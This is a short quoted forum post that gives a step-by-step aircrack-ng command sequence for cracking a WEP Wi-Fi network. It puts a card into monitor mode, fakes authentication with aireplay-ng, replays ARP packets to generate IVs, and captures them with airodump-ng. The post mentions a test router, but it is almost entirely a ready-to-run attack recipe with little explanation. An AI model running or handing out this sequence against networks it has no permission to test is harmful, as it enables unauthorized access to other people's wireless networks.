
Originally Posted by
dwjs1974
while you are capping the Ivs open a new console window
try this worked well with my router
airmon-ng start wifi0 10
wlanconfig ath0 destroy
AP=(MAC of your test Router)
WIFI=(Mac of the WIFI card)
ifconfig ath1 up
iwconfig ath1 mode Monitor channel 10
aireplay-ng -1 0 -e "Networkname" -a $AP -h $WIFI ath1
aireplay-ng -3 -e "Networkname" -b $AP -a $AP -h $wifi ath1
airodump-ng -w whatever.cap ath1
This worked on the last release I havent been able to try this on the new release due to issues..
Hope this helps.